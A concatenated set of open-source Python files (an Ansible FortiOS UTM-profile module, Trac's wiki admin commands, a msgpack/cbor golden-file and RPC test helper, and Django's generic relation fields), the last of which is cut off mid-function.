aperigault/ansible | lib/ansible/modules/network/fortios/fortios_wireless_controller_utm_profile.py | 19 | 10162 | #!/usr/bin/python
from __future__ import (absolute_import, division, print_function)
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
__metaclass__ = type
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.1'}
DOCUMENTATION = '''
---
module: fortios_wireless_controller_utm_profile
short_description: Configure UTM (Unified Threat Management) profile in Fortinet's FortiOS and FortiGate.
description:
- This module is able to configure a FortiGate or FortiOS by allowing the
user to set and modify wireless_controller feature and utm_profile category.
      Examples include all parameters and values which need to be adjusted to datasources before usage.
Tested with FOS v6.0.2
version_added: "2.8"
author:
- Miguel Angel Munoz (@mamunozgonzalez)
- Nicolas Thomas (@thomnico)
notes:
- Requires fortiosapi library developed by Fortinet
- Run as a local_action in your playbook
requirements:
- fortiosapi>=0.9.8
options:
host:
description:
- FortiOS or FortiGate ip address.
required: true
username:
description:
- FortiOS or FortiGate username.
required: true
password:
description:
- FortiOS or FortiGate password.
default: ""
vdom:
description:
- Virtual domain, among those defined previously. A vdom is a
virtual instance of the FortiGate that can be configured and
used as a different unit.
default: root
https:
description:
- Indicates if the requests towards FortiGate must use HTTPS
protocol
type: bool
default: true
wireless_controller_utm_profile:
description:
- Configure UTM (Unified Threat Management) profile.
default: null
suboptions:
state:
description:
- Indicates whether to create or remove the object
choices:
- present
- absent
antivirus-profile:
description:
- AntiVirus profile name. Source antivirus.profile.name.
application-list:
description:
- Application control list name. Source application.list.name.
comment:
description:
- Comment.
ips-sensor:
description:
- IPS sensor name. Source ips.sensor.name.
name:
description:
- UTM profile name.
required: true
scan-botnet-connections:
description:
- Block or monitor connections to Botnet servers or disable Botnet scanning.
choices:
- disable
- block
- monitor
utm-log:
description:
- Enable/disable UTM logging.
choices:
- enable
- disable
webfilter-profile:
description:
- WebFilter profile name. Source webfilter.profile.name.
'''
EXAMPLES = '''
- hosts: localhost
vars:
host: "192.168.122.40"
username: "admin"
password: ""
vdom: "root"
tasks:
- name: Configure UTM (Unified Threat Management) profile.
fortios_wireless_controller_utm_profile:
host: "{{ host }}"
username: "{{ username }}"
password: "{{ password }}"
vdom: "{{ vdom }}"
https: "False"
wireless_controller_utm_profile:
state: "present"
antivirus-profile: "<your_own_value> (source antivirus.profile.name)"
application-list: "<your_own_value> (source application.list.name)"
comment: "Comment."
ips-sensor: "<your_own_value> (source ips.sensor.name)"
name: "default_name_7"
scan-botnet-connections: "disable"
utm-log: "enable"
webfilter-profile: "<your_own_value> (source webfilter.profile.name)"
'''
RETURN = '''
build:
description: Build number of the fortigate image
returned: always
type: str
sample: '1547'
http_method:
description: Last method used to provision the content into FortiGate
returned: always
type: str
sample: 'PUT'
http_status:
description: Last result given by FortiGate on last operation applied
returned: always
type: str
sample: "200"
mkey:
description: Master key (id) used in the last call to FortiGate
returned: success
type: str
sample: "id"
name:
description: Name of the table used to fulfill the request
returned: always
type: str
sample: "urlfilter"
path:
description: Path of the table used to fulfill the request
returned: always
type: str
sample: "webfilter"
revision:
description: Internal revision number
returned: always
type: str
sample: "17.0.2.10658"
serial:
description: Serial number of the unit
returned: always
type: str
sample: "FGVMEVYYQT3AB5352"
status:
description: Indication of the operation's result
returned: always
type: str
sample: "success"
vdom:
description: Virtual domain used
returned: always
type: str
sample: "root"
version:
description: Version of the FortiGate
returned: always
type: str
sample: "v5.6.3"
'''
from ansible.module_utils.basic import AnsibleModule
def login(data, fos):
host = data['host']
username = data['username']
password = data['password']
fos.debug('on')
if 'https' in data and not data['https']:
fos.https('off')
else:
fos.https('on')
fos.login(host, username, password)
def filter_wireless_controller_utm_profile_data(json):
option_list = ['antivirus-profile', 'application-list', 'comment',
'ips-sensor', 'name', 'scan-botnet-connections',
'utm-log', 'webfilter-profile']
dictionary = {}
for attribute in option_list:
if attribute in json and json[attribute] is not None:
dictionary[attribute] = json[attribute]
return dictionary
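# Example (illustrative): {'name': 'wifi-utm', 'comment': None, 'state': 'present'}
# filters down to {'name': 'wifi-utm'} -- None values and non-schema keys such
# as 'state' are dropped before the payload reaches the FortiGate API.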
def flatten_multilists_attributes(data):
multilist_attrs = []
for attr in multilist_attrs:
try:
path = "data['" + "']['".join(elem for elem in attr) + "']"
current_val = eval(path)
flattened_val = ' '.join(elem for elem in current_val)
exec(path + '= flattened_val')
except BaseException:
pass
return data
def wireless_controller_utm_profile(data, fos):
vdom = data['vdom']
wireless_controller_utm_profile_data = data['wireless_controller_utm_profile']
flattened_data = flatten_multilists_attributes(wireless_controller_utm_profile_data)
filtered_data = filter_wireless_controller_utm_profile_data(flattened_data)
if wireless_controller_utm_profile_data['state'] == "present":
return fos.set('wireless-controller',
'utm-profile',
data=filtered_data,
vdom=vdom)
elif wireless_controller_utm_profile_data['state'] == "absent":
return fos.delete('wireless-controller',
'utm-profile',
mkey=filtered_data['name'],
vdom=vdom)
def fortios_wireless_controller(data, fos):
login(data, fos)
if data['wireless_controller_utm_profile']:
resp = wireless_controller_utm_profile(data, fos)
fos.logout()
return not resp['status'] == "success", resp['status'] == "success", resp
def main():
fields = {
"host": {"required": True, "type": "str"},
"username": {"required": True, "type": "str"},
"password": {"required": False, "type": "str", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"wireless_controller_utm_profile": {
"required": False, "type": "dict",
"options": {
"state": {"required": True, "type": "str",
"choices": ["present", "absent"]},
"antivirus-profile": {"required": False, "type": "str"},
"application-list": {"required": False, "type": "str"},
"comment": {"required": False, "type": "str"},
"ips-sensor": {"required": False, "type": "str"},
"name": {"required": True, "type": "str"},
"scan-botnet-connections": {"required": False, "type": "str",
"choices": ["disable", "block", "monitor"]},
"utm-log": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"webfilter-profile": {"required": False, "type": "str"}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
is_error, has_changed, result = fortios_wireless_controller(module.params, fos)
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| gpl-3.0 |
rbaumg/trac | trac/wiki/admin.py | 1 | 12181 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2008-2019 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.com/license.html.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/.
import os.path
import pkg_resources
import sys
from trac.admin import *
from trac.api import IEnvironmentSetupParticipant
from trac.core import *
from trac.wiki import model
from trac.wiki.api import WikiSystem, validate_page_name
from trac.util import read_file
from trac.util.datefmt import datetime_now, format_datetime, from_utimestamp, \
to_utimestamp, utc
from trac.util.text import path_to_unicode, print_table, printout, \
to_unicode, unicode_quote, unicode_unquote
from trac.util.translation import _
class WikiAdmin(Component):
"""trac-admin command provider for wiki administration."""
implements(IAdminCommandProvider, IEnvironmentSetupParticipant)
# IAdminCommandProvider methods
def get_admin_commands(self):
yield ('wiki list', '',
'List wiki pages',
None, self._do_list)
yield ('wiki rename', '<page> <new_name>',
'Rename wiki page',
self._complete_page, self._do_rename)
yield ('wiki remove', '<page>',
'Remove wiki page',
self._complete_page, self._do_remove)
yield ('wiki export', '<page> [file]',
'Export wiki page to file or stdout',
self._complete_import_export, self._do_export)
yield ('wiki import', '<page> [file]',
'Import wiki page from file or stdin',
self._complete_import_export, self._do_import)
yield ('wiki dump', '<directory> [page] [...]',
"""Export wiki pages to files named by title
Individual wiki page names can be specified after the directory.
A name ending with a * means that all wiki pages starting with
that prefix should be dumped. If no name is specified, all wiki
pages are dumped.""",
self._complete_dump, self._do_dump)
yield ('wiki load', '<path> [...]',
"""Import wiki pages from files
If a given path is a file, it is imported as a page with the
name of the file. If a path is a directory, all files in that
directory are imported.""",
self._complete_load_replace, self._do_load)
yield ('wiki replace', '<path> [...]',
"""Replace content of wiki pages from files (DANGEROUS!)
This command replaces the content of the last version of one
or more wiki pages with new content. The previous content is
lost, and no new entry is created in the page history. The
metadata of the page (time, author) is not changed either.
If a given path is a file, it is imported as a page with the
name of the file. If a path is a directory, all files in that
directory are imported.
WARNING: This operation results in the loss of the previous
content and cannot be undone. It may be advisable to backup
the current content using "wiki dump" beforehand.""",
self._complete_load_replace, self._do_replace)
yield ('wiki upgrade', '',
'Upgrade default wiki pages to current version',
None, self._do_upgrade)
def get_wiki_list(self):
return list(WikiSystem(self.env).get_pages())
def export_page(self, page, filename):
for text, in self.env.db_query("""
SELECT text FROM wiki WHERE name=%s
ORDER BY version DESC LIMIT 1
""", (page,)):
if not filename:
printout(text)
else:
if os.path.isfile(filename):
raise AdminCommandError(_("File '%(name)s' exists",
name=path_to_unicode(filename)))
with open(filename, 'w') as f:
f.write(text.encode('utf-8'))
break
else:
raise AdminCommandError(_("Page '%(page)s' not found", page=page))
def import_page(self, filename, title, create_only=[],
replace=False):
if not validate_page_name(title):
raise AdminCommandError(_("Invalid Wiki page name '%(name)s'",
name=title))
if filename:
if not os.path.isfile(filename):
raise AdminCommandError(_("'%(name)s' is not a file",
name=path_to_unicode(filename)))
data = read_file(filename)
else:
data = sys.stdin.read()
data = to_unicode(data, 'utf-8')
with self.env.db_transaction as db:
# Make sure we don't insert the exact same page twice
old = db("""SELECT text FROM wiki WHERE name=%s
ORDER BY version DESC LIMIT 1
""", (title,))
if old and title in create_only:
printout(_(" %(title)s already exists", title=title))
return False
if old and data == old[0][0]:
printout(_(" %(title)s is already up to date", title=title))
return False
if replace and old:
db("""UPDATE wiki SET text=%s
WHERE name=%s
AND version=(SELECT max(version) FROM wiki
WHERE name=%s)
""", (data, title, title))
else:
db("""INSERT INTO wiki (version, readonly, name, time, author,
text)
SELECT 1 + COALESCE(max(version), 0),
COALESCE(max(readonly), 0),
%s, %s, 'trac', %s FROM wiki
WHERE name=%s AND version=(SELECT max(version)
FROM wiki WHERE name=%s)
""", (title, to_utimestamp(datetime_now(utc)), data,
title, title))
if not old:
del WikiSystem(self.env).pages
return True
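    # Illustrative trac-admin session (an assumption about typical usage):
    #   trac-admin /path/to/env wiki import MyPage /tmp/MyPage
    #   trac-admin /path/to/env wiki export MyPage /tmp/MyPage.out
    # Both commands end up in import_page()/export_page() above.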
def load_pages(self, dir, ignore=[], create_only=[], replace=False):
with self.env.db_transaction:
for page in os.listdir(dir):
if page in ignore:
continue
filename = os.path.join(dir, page)
page = unicode_unquote(page.encode('utf-8'))
if os.path.isfile(filename):
if self.import_page(filename, page, create_only, replace):
self.log.info("%s imported from %s",
page, path_to_unicode(filename))
def _complete_page(self, args):
if len(args) == 1:
return self.get_wiki_list()
def _complete_import_export(self, args):
if len(args) == 1:
return self.get_wiki_list()
elif len(args) == 2:
return get_dir_list(args[-1])
def _complete_dump(self, args):
if len(args) == 1:
return get_dir_list(args[-1], dirs_only=True)
elif len(args) >= 2:
return self.get_wiki_list()
def _complete_load_replace(self, args):
if len(args) >= 1:
return get_dir_list(args[-1])
def _do_list(self):
print_table(
[(title, int(edits), format_datetime(from_utimestamp(modified),
console_datetime_format))
for title, edits, modified in self.env.db_query("""
SELECT name, max(version), max(time)
FROM wiki GROUP BY name ORDER BY name""")
], [_("Title"), _("Edits"), _("Modified")])
def _do_rename(self, name, new_name):
if new_name == name:
return
if not new_name:
raise AdminCommandError(_("A new name is mandatory for a rename."))
if not validate_page_name(new_name):
raise AdminCommandError(_("The new name is invalid."))
with self.env.db_transaction:
if model.WikiPage(self.env, new_name).exists:
raise AdminCommandError(_("The page %(name)s already exists.",
name=new_name))
page = model.WikiPage(self.env, name)
page.rename(new_name)
def _do_remove(self, name):
with self.env.db_transaction:
if name.endswith('*'):
pages = list(WikiSystem(self.env).get_pages(name.rstrip('*')
or None))
for p in pages:
page = model.WikiPage(self.env, p)
page.delete()
print_table(((p,) for p in pages), [_('Deleted pages')])
else:
page = model.WikiPage(self.env, name)
page.delete()
def _do_export(self, page, filename=None):
self.export_page(page, filename)
def _do_import(self, page, filename=None):
self.import_page(filename, page)
def _do_dump(self, directory, *names):
if not names:
names = ['*']
pages = self.get_wiki_list()
if not os.path.isdir(directory):
if not os.path.exists(directory):
os.mkdir(directory)
else:
raise AdminCommandError(_("'%(name)s' is not a directory",
name=path_to_unicode(directory)))
for p in pages:
if any(p == name or (name.endswith('*')
and p.startswith(name[:-1]))
for name in names):
dst = os.path.join(directory, unicode_quote(p, ''))
printout(' %s => %s' % (p, dst))
self.export_page(p, dst)
def _load_or_replace(self, paths, replace):
with self.env.db_transaction:
for path in paths:
if os.path.isdir(path):
self.load_pages(path, replace=replace)
else:
page = os.path.basename(path)
page = unicode_unquote(page.encode('utf-8'))
if self.import_page(path, page, replace=replace):
printout(_(" %(page)s imported from %(filename)s",
filename=path_to_unicode(path), page=page))
def _do_load(self, *paths):
self._load_or_replace(paths, replace=False)
def _do_replace(self, *paths):
self._load_or_replace(paths, replace=True)
def _do_upgrade(self):
self.load_pages(pkg_resources.resource_filename('trac.wiki',
'default-pages'),
ignore=['WikiStart', 'SandBox'],
create_only=['InterMapTxt'])
# IEnvironmentSetupParticipant methods
def environment_created(self):
"""Add default wiki pages when environment is created."""
self.log.info("Installing default wiki pages")
pages_dir = pkg_resources.resource_filename('trac.wiki',
'default-pages')
with self.env.db_transaction as db:
self.load_pages(pages_dir)
for page in os.listdir(pages_dir):
if page not in ('InterMapTxt', 'SandBox', 'WikiStart'):
db("UPDATE wiki SET readonly='1' WHERE name=%s", (page,))
def environment_needs_upgrade(self):
pass
def upgrade_environment(self):
pass
| bsd-3-clause |
mdshuai/kubernetes | vendor/github.com/ugorji/go/codec/test.py | 1516 | 4019 | #!/usr/bin/env python
# This will create golden files in a directory passed to it.
# A Test calls this internally to create the golden files
# So it can process them (so we don't have to checkin the files).
# Ensure msgpack-python and cbor are installed first, using:
# sudo apt-get install python-dev
# sudo apt-get install python-pip
# pip install --user msgpack-python msgpack-rpc-python cbor
# Ensure all "string" keys are utf strings (else encoded as bytes)
import cbor, msgpack, msgpackrpc, sys, os, threading
def get_test_data_list():
# get list with all primitive types, and a combo type
l0 = [
-8,
-1616,
-32323232,
-6464646464646464,
192,
1616,
32323232,
6464646464646464,
192,
-3232.0,
-6464646464.0,
3232.0,
6464.0,
6464646464.0,
False,
True,
u"null",
None,
u"someday",
1328176922000002000,
u"",
-2206187877999998000,
u"bytestring",
270,
u"none",
-2013855847999995777,
#-6795364578871345152,
]
l1 = [
{ "true": True,
"false": False },
{ "true": u"True",
"false": False,
"uint16(1616)": 1616 },
{ "list": [1616, 32323232, True, -3232.0, {"TRUE":True, "FALSE":False}, [True, False] ],
"int32":32323232, "bool": True,
"LONG STRING": u"123456789012345678901234567890123456789012345678901234567890",
"SHORT STRING": u"1234567890" },
{ True: "true", 138: False, "false": 200 }
]
l = []
l.extend(l0)
l.append(l0)
l.append(1)
l.extend(l1)
return l
def build_test_data(destdir):
l = get_test_data_list()
for i in range(len(l)):
# packer = msgpack.Packer()
serialized = msgpack.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.msgpack.golden'), 'wb')
f.write(serialized)
f.close()
serialized = cbor.dumps(l[i])
f = open(os.path.join(destdir, str(i) + '.cbor.golden'), 'wb')
f.write(serialized)
f.close()
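# Example (illustrative): build_test_data('/tmp/golden') writes one pair of
# files per entry -- 0.msgpack.golden / 0.cbor.golden, 1.msgpack.golden /
# 1.cbor.golden, and so on -- which the calling test suite then reads back.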
def doRpcServer(port, stopTimeSec):
class EchoHandler(object):
def Echo123(self, msg1, msg2, msg3):
return ("1:%s 2:%s 3:%s" % (msg1, msg2, msg3))
def EchoStruct(self, msg):
return ("%s" % msg)
addr = msgpackrpc.Address('localhost', port)
server = msgpackrpc.Server(EchoHandler())
server.listen(addr)
# run thread to stop it after stopTimeSec seconds if > 0
if stopTimeSec > 0:
def myStopRpcServer():
server.stop()
t = threading.Timer(stopTimeSec, myStopRpcServer)
t.start()
server.start()
def doRpcClientToPythonSvc(port):
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("Echo123", "A1", "B2", "C3")
print client.call("EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doRpcClientToGoSvc(port):
# print ">>>> port: ", port, " <<<<<"
address = msgpackrpc.Address('localhost', port)
client = msgpackrpc.Client(address, unpack_encoding='utf-8')
print client.call("TestRpcInt.Echo123", ["A1", "B2", "C3"])
print client.call("TestRpcInt.EchoStruct", {"A" :"Aa", "B":"Bb", "C":"Cc"})
def doMain(args):
if len(args) == 2 and args[0] == "testdata":
build_test_data(args[1])
elif len(args) == 3 and args[0] == "rpc-server":
doRpcServer(int(args[1]), int(args[2]))
elif len(args) == 2 and args[0] == "rpc-client-python-service":
doRpcClientToPythonSvc(int(args[1]))
elif len(args) == 2 and args[0] == "rpc-client-go-service":
doRpcClientToGoSvc(int(args[1]))
else:
print("Usage: test.py " +
"[testdata|rpc-server|rpc-client-python-service|rpc-client-go-service] ...")
if __name__ == "__main__":
doMain(sys.argv[1:])
| apache-2.0 |
divio/django | django/contrib/contenttypes/fields.py | 73 | 22873 | from __future__ import unicode_literals
from collections import defaultdict
from django.contrib.contenttypes.models import ContentType
from django.core import checks
from django.core.exceptions import FieldDoesNotExist, ObjectDoesNotExist
from django.db import DEFAULT_DB_ALIAS, connection, models, router, transaction
from django.db.models import DO_NOTHING, signals
from django.db.models.base import ModelBase
from django.db.models.fields.related import (
ForeignObject, ForeignObjectRel, ForeignRelatedObjectsDescriptor,
)
from django.db.models.query_utils import PathInfo
from django.utils.encoding import python_2_unicode_compatible, smart_text
from django.utils.functional import cached_property
@python_2_unicode_compatible
class GenericForeignKey(object):
"""
Provide a generic many-to-one relation through the ``content_type`` and
``object_id`` fields.
This class also doubles as an accessor to the related object (similar to
ReverseSingleRelatedObjectDescriptor) by adding itself as a model
attribute.
"""
# Field flags
auto_created = False
concrete = False
editable = False
hidden = False
is_relation = True
many_to_many = False
many_to_one = True
one_to_many = False
one_to_one = False
related_model = None
remote_field = None
allow_unsaved_instance_assignment = False
def __init__(self, ct_field='content_type', fk_field='object_id', for_concrete_model=True):
self.ct_field = ct_field
self.fk_field = fk_field
self.for_concrete_model = for_concrete_model
self.editable = False
self.rel = None
self.column = None
def contribute_to_class(self, cls, name, **kwargs):
self.name = name
self.model = cls
self.cache_attr = "_%s_cache" % name
cls._meta.add_field(self, virtual=True)
# Only run pre-initialization field assignment on non-abstract models
if not cls._meta.abstract:
signals.pre_init.connect(self.instance_pre_init, sender=cls)
setattr(cls, name, self)
def __str__(self):
model = self.model
app = model._meta.app_label
return '%s.%s.%s' % (app, model._meta.object_name, self.name)
def check(self, **kwargs):
errors = []
errors.extend(self._check_field_name())
errors.extend(self._check_object_id_field())
errors.extend(self._check_content_type_field())
return errors
def _check_field_name(self):
if self.name.endswith("_"):
return [
checks.Error(
'Field names must not end with an underscore.',
hint=None,
obj=self,
id='fields.E001',
)
]
else:
return []
def _check_object_id_field(self):
try:
self.model._meta.get_field(self.fk_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey object ID references the non-existent field '%s'." % self.fk_field,
hint=None,
obj=self,
id='contenttypes.E001',
)
]
else:
return []
def _check_content_type_field(self):
"""
Check if field named `field_name` in model `model` exists and is a
valid content_type field (is a ForeignKey to ContentType).
"""
try:
field = self.model._meta.get_field(self.ct_field)
except FieldDoesNotExist:
return [
checks.Error(
"The GenericForeignKey content type references the non-existent field '%s.%s'." % (
self.model._meta.object_name, self.ct_field
),
hint=None,
obj=self,
id='contenttypes.E002',
)
]
else:
if not isinstance(field, models.ForeignKey):
return [
checks.Error(
"'%s.%s' is not a ForeignKey." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E003',
)
]
elif field.remote_field.model != ContentType:
return [
checks.Error(
"'%s.%s' is not a ForeignKey to 'contenttypes.ContentType'." % (
self.model._meta.object_name, self.ct_field
),
hint=(
"GenericForeignKeys must use a ForeignKey to "
"'contenttypes.ContentType' as the 'content_type' field."
),
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def instance_pre_init(self, signal, sender, args, kwargs, **_kwargs):
"""
Handle initializing an object with the generic FK instead of
content_type and object_id fields.
"""
if self.name in kwargs:
value = kwargs.pop(self.name)
if value is not None:
kwargs[self.ct_field] = self.get_content_type(obj=value)
kwargs[self.fk_field] = value._get_pk_val()
else:
kwargs[self.ct_field] = None
kwargs[self.fk_field] = None
def get_content_type(self, obj=None, id=None, using=None):
if obj is not None:
return ContentType.objects.db_manager(obj._state.db).get_for_model(
obj, for_concrete_model=self.for_concrete_model)
elif id is not None:
return ContentType.objects.db_manager(using).get_for_id(id)
else:
# This should never happen. I love comments like this, don't you?
raise Exception("Impossible arguments to GFK.get_content_type!")
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is not None:
raise ValueError("Custom queryset can't be used for this lookup.")
# For efficiency, group the instances by content type and then do one
# query per model
fk_dict = defaultdict(set)
# We need one instance for each group in order to get the right db:
instance_dict = {}
ct_attname = self.model._meta.get_field(self.ct_field).get_attname()
for instance in instances:
# We avoid looking for values if either ct_id or fkey value is None
ct_id = getattr(instance, ct_attname)
if ct_id is not None:
fk_val = getattr(instance, self.fk_field)
if fk_val is not None:
fk_dict[ct_id].add(fk_val)
instance_dict[ct_id] = instance
ret_val = []
for ct_id, fkeys in fk_dict.items():
instance = instance_dict[ct_id]
ct = self.get_content_type(id=ct_id, using=instance._state.db)
ret_val.extend(ct.get_all_objects_for_this_type(pk__in=fkeys))
# For doing the join in Python, we have to match both the FK val and the
# content type, so we use a callable that returns a (fk, class) pair.
def gfk_key(obj):
ct_id = getattr(obj, ct_attname)
if ct_id is None:
return None
else:
model = self.get_content_type(id=ct_id,
using=obj._state.db).model_class()
return (model._meta.pk.get_prep_value(getattr(obj, self.fk_field)),
model)
return (ret_val,
lambda obj: (obj._get_pk_val(), obj.__class__),
gfk_key,
True,
self.cache_attr)
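    # Illustrative effect (model names are made up): given
    #   TaggedItem.objects.prefetch_related('content_object')
    # one extra query is issued per distinct content type among the rows, and
    # gfk_key() matches each fetched object back on its (pk, model class) pair.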
def is_cached(self, instance):
return hasattr(instance, self.cache_attr)
def __get__(self, instance, instance_type=None):
if instance is None:
return self
try:
return getattr(instance, self.cache_attr)
except AttributeError:
rel_obj = None
# Make sure to use ContentType.objects.get_for_id() to ensure that
# lookups are cached (see ticket #5570). This takes more code than
# the naive ``getattr(instance, self.ct_field)``, but has better
# performance when dealing with GFKs in loops and such.
f = self.model._meta.get_field(self.ct_field)
ct_id = getattr(instance, f.get_attname(), None)
if ct_id is not None:
ct = self.get_content_type(id=ct_id, using=instance._state.db)
try:
rel_obj = ct.get_object_for_this_type(pk=getattr(instance, self.fk_field))
except ObjectDoesNotExist:
pass
setattr(instance, self.cache_attr, rel_obj)
return rel_obj
def __set__(self, instance, value):
ct = None
fk = None
if value is not None:
ct = self.get_content_type(obj=value)
fk = value._get_pk_val()
if not self.allow_unsaved_instance_assignment and fk is None:
raise ValueError(
'Cannot assign "%r": "%s" instance isn\'t saved in the database.' %
(value, value._meta.object_name)
)
setattr(instance, self.ct_field, ct)
setattr(instance, self.fk_field, fk)
setattr(instance, self.cache_attr, value)
class GenericRel(ForeignObjectRel):
"""
Used by GenericRelation to store information about the relation.
"""
def __init__(self, field, to, related_name=None, related_query_name=None, limit_choices_to=None):
super(GenericRel, self).__init__(
field, to,
related_name=related_query_name or '+',
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
on_delete=DO_NOTHING,
)
class GenericRelation(ForeignObject):
"""
Provide a reverse to a relation created by a GenericForeignKey.
"""
# Field flags
auto_created = False
many_to_many = False
many_to_one = False
one_to_many = True
one_to_one = False
rel_class = GenericRel
def __init__(self, to, object_id_field='object_id', content_type_field='content_type',
for_concrete_model=True, related_query_name=None, limit_choices_to=None, **kwargs):
kwargs['rel'] = self.rel_class(
self, to,
related_query_name=related_query_name,
limit_choices_to=limit_choices_to,
)
kwargs['blank'] = True
kwargs['editable'] = False
kwargs['serialize'] = False
# This construct is somewhat of an abuse of ForeignObject. This field
# represents a relation from pk to object_id field. But, this relation
# isn't direct, the join is generated reverse along foreign key. So,
# the from_field is object_id field, to_field is pk because of the
# reverse join.
super(GenericRelation, self).__init__(
to, from_fields=[object_id_field], to_fields=[], **kwargs)
self.object_id_field_name = object_id_field
self.content_type_field_name = content_type_field
self.for_concrete_model = for_concrete_model
def check(self, **kwargs):
errors = super(GenericRelation, self).check(**kwargs)
errors.extend(self._check_generic_foreign_key_existence())
return errors
def _check_generic_foreign_key_existence(self):
target = self.remote_field.model
if isinstance(target, ModelBase):
fields = target._meta.virtual_fields
if any(isinstance(field, GenericForeignKey) and
field.ct_field == self.content_type_field_name and
field.fk_field == self.object_id_field_name
for field in fields):
return []
else:
return [
checks.Error(
("The GenericRelation defines a relation with the model "
"'%s.%s', but that model does not have a GenericForeignKey.") % (
target._meta.app_label, target._meta.object_name
),
hint=None,
obj=self,
id='contenttypes.E004',
)
]
else:
return []
def resolve_related_fields(self):
self.to_fields = [self.model._meta.pk.name]
return [(self.remote_field.model._meta.get_field(self.object_id_field_name), self.model._meta.pk)]
def get_path_info(self):
opts = self.remote_field.model._meta
target = opts.pk
return [PathInfo(self.model._meta, opts, (target,), self.remote_field, True, False)]
def get_reverse_path_info(self):
opts = self.model._meta
from_opts = self.remote_field.model._meta
return [PathInfo(from_opts, opts, (opts.pk,), self, not self.unique, False)]
def get_choices_default(self):
return super(GenericRelation, self).get_choices(include_blank=False)
def value_to_string(self, obj):
qs = getattr(obj, self.name).all()
return smart_text([instance._get_pk_val() for instance in qs])
def contribute_to_class(self, cls, name, **kwargs):
kwargs['virtual_only'] = True
super(GenericRelation, self).contribute_to_class(cls, name, **kwargs)
self.model = cls
setattr(cls, self.name, ReverseGenericRelatedObjectsDescriptor(self.remote_field))
def set_attributes_from_rel(self):
pass
def get_internal_type(self):
return "ManyToManyField"
def get_content_type(self):
"""
Return the content type associated with this field's model.
"""
return ContentType.objects.get_for_model(self.model,
for_concrete_model=self.for_concrete_model)
def get_extra_restriction(self, where_class, alias, remote_alias):
field = self.remote_field.model._meta.get_field(self.content_type_field_name)
contenttype_pk = self.get_content_type().pk
cond = where_class()
lookup = field.get_lookup('exact')(field.get_col(remote_alias), contenttype_pk)
cond.add(lookup, 'AND')
return cond
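    # Illustrative effect (model names are made up): for
    #   class Post(Model): comments = GenericRelation(Comment)
    # the join to Comment gains an extra "content_type_id = <Post ct pk>"
    # condition, so Post.objects.filter(comments__author='bob') cannot match
    # Comment rows that point at some other model.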
def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
"""
Return all objects related to ``objs`` via this ``GenericRelation``.
"""
return self.remote_field.model._base_manager.db_manager(using).filter(**{
"%s__pk" % self.content_type_field_name: ContentType.objects.db_manager(using).get_for_model(
self.model, for_concrete_model=self.for_concrete_model).pk,
"%s__in" % self.object_id_field_name: [obj.pk for obj in objs]
})
class ReverseGenericRelatedObjectsDescriptor(ForeignRelatedObjectsDescriptor):
"""
Accessor to the related objects manager on the one-to-many relation created
by GenericRelation.
In the example::
class Post(Model):
comments = GenericRelation(Comment)
``post.comments`` is a ReverseGenericRelatedObjectsDescriptor instance.
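    A usage sketch, continuing the example above (``text`` is an assumed
    field on ``Comment``)::

        post.comments.all()             # query the related comments
        post.comments.create(text='x')  # create one bound to this post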
"""
@cached_property
def related_manager_cls(self):
return create_generic_related_manager(
self.rel.model._default_manager.__class__,
self.rel,
)
def create_generic_related_manager(superclass, rel):
"""
Factory function to create a manager that subclasses another manager
(generally the default manager of a given model) and adds behaviors
specific to generic relations.
"""
class GenericRelatedObjectManager(superclass):
def __init__(self, instance=None):
super(GenericRelatedObjectManager, self).__init__()
self.instance = instance
self.model = rel.model
content_type = ContentType.objects.db_manager(instance._state.db).get_for_model(
instance, for_concrete_model=rel.field.for_concrete_model)
self.content_type = content_type
qn = connection.ops.quote_name
join_cols = rel.field.get_joining_columns(reverse_join=True)[0]
self.source_col_name = qn(join_cols[0])
self.target_col_name = qn(join_cols[1])
self.content_type_field_name = rel.field.content_type_field_name
self.object_id_field_name = rel.field.object_id_field_name
self.prefetch_cache_name = rel.field.attname
self.pk_val = instance._get_pk_val()
self.core_filters = {
'%s__pk' % self.content_type_field_name: content_type.id,
self.object_id_field_name: self.pk_val,
}
def __call__(self, **kwargs):
# We use **kwargs rather than a kwarg argument to enforce the
# `manager='manager_name'` syntax.
manager = getattr(self.model, kwargs.pop('manager'))
manager_class = create_generic_related_manager(manager.__class__, rel)
return manager_class(instance=self.instance)
do_not_call_in_templates = True
def __str__(self):
return repr(self)
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**self.core_filters)
def get_prefetch_queryset(self, instances, queryset=None):
if queryset is None:
